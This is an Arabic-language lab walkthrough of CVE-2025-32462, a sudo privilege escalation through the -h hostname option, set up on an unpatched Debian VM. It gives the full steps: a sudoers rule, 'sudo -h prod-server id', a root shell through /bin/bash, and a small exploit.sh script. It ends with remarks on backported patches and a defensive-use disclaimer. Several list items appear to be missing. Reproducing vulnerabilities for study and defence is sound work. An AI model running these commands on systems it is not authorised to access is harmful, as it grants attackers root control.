
CVE-2025-32462 هي ثغرة تصعيد صلاحيات محلية في sudo.
CVE-2025-32462 هي ثغرة تصعيد امتيازات محلية في sudo تتيح لمستخدم منخفض الامتيازات تنفيذ أوامر بصلاحيات الجذر (root) عبر استغلال قواعد sudo المقيدة باسم المضيف. تكمن المشكلة في الطريقة التي تعامل بها sudo تاريخيًا مع خيار -h (المضيف) أثناء فحوصات الترخيص.
عندما تكون قاعدة sudoers مقيدة باسم مضيف محدد، يجب أن يسمح sudo بالتنفيذ فقط عندما يتطابق اسم مضيف النظام مع القاعدة. وبسبب منطق معيب، وثقت الإصدارات المتأثرة بـاسم مضيف يقدمه المستخدم عبر sudo -h، مما سمح للمهاجمين بتجاوز القيد بالكامل.
سمح sudo للوسيط -h <hostname> بالتأثير على قرارات الترخيص. في الإصدارات المتأثرة، كان اسم المضيف المقدَّم محل ثقة أثناء تقييم قاعدة sudoers، بدلاً من التحقق منه بدقة مقابل اسم المضيف الحقيقي للنظام.
ونتيجة لذلك، يمكن تجاوز قيود sudo القائمة على اسم المضيف.
إذا تم استغلالها بنجاح، يمكن لمهاجم محلي أن:
في البيئات الواقعية، تُعد هذه الثغرة خطيرة بشكل خاص في:
| المكوّن | التفاصيل |
|---|---|
| نظام التشغيل | Debian 11 (Bullseye – غير مصحّح) |
| إصدار sudo | ≤ 1.9.13 |
| مستوى الوصول | مستخدم محلي |
| المحاكاة الافتراضية | VirtualBox |
⚠️ ملاحظة: تتضمن إصدارات Ubuntu وDebian الحديثة تصحيحات معاد نقلها (backported) مع الاحتفاظ بسلاسل إصدارات مماثلة. لا يمكن إعادة إنتاج هذه الثغرة على الأنظمة المصححة.
sudo --version
المتوقع (الإصدار المتأثر):
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
المتوقع:
attacker : attacker
يجب ألا ينتمي المستخدم إلى مجموعة sudo.
حرّر إعدادات sudoers بأمان:
sudo visudo
أضف السطر التالي:
attacker prod-server = (root) ALL
prod-server هو اسم مضيف وهميتحقق:
sudo -l -U attacker
المتوقع:
User attacker may run the following commands on prod-server:
(root) ALL
بدّل المستخدم:
su - attacker
حاول استخدام sudo بشكل اعتيادي:
sudo id
المتوقع:
attacker is not allowed to run sudo on <hostname>
شغّل الثغرة:
sudo -h prod-server id
مخرجات الاستغلال الناجح:
uid=0(root) gid=0(root) groups=0(root)
افتح قشرة (shell) بصلاحيات root:
sudo -h prod-server /bin/bash
تحقق:
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
احفظ الملف باسم exploit.sh، واجعله قابلاً للتنفيذ، ثم شغّله كمستخدم attacker:
chmod +x exploit.sh
./exploit.sh
| الإجراء | النتيجة |
|---|---|
| sudo اعتيادي | ❌ مرفوض |
sudo -h prod-server id | ✅ صلاحيات root |
يؤكد هذا نجاح عملية تصعيد الامتيازات.
تبدو إصدارات Ubuntu الحديثة وكأنها تأتي بإصدارات من sudo تقع ضمن النطاق المتأثر. غير أن Ubuntu قامت بإعادة نقل التصحيح الأمني (backport) الخاص بـ CVE‑2025‑32462 دون تغيير سلسلة الإصدار الأصلية.
ونتيجة لذلك:
sudo -h يؤثر في فحوصات الترخيصيُبرز هذا أهمية التحقق من حالة الثغرة باستخدام الاختبار السلوكي، وليس سلاسل الإصدارات وحدها.
sudo إلى إصدار مصحّحهذا الشرح لأغراض البحث الأمني التعليمي والدفاعي فقط. لا تختبر هذه الثغرة على أنظمة لا تملكها أو ليس لديك إذن صريح بتقييمها.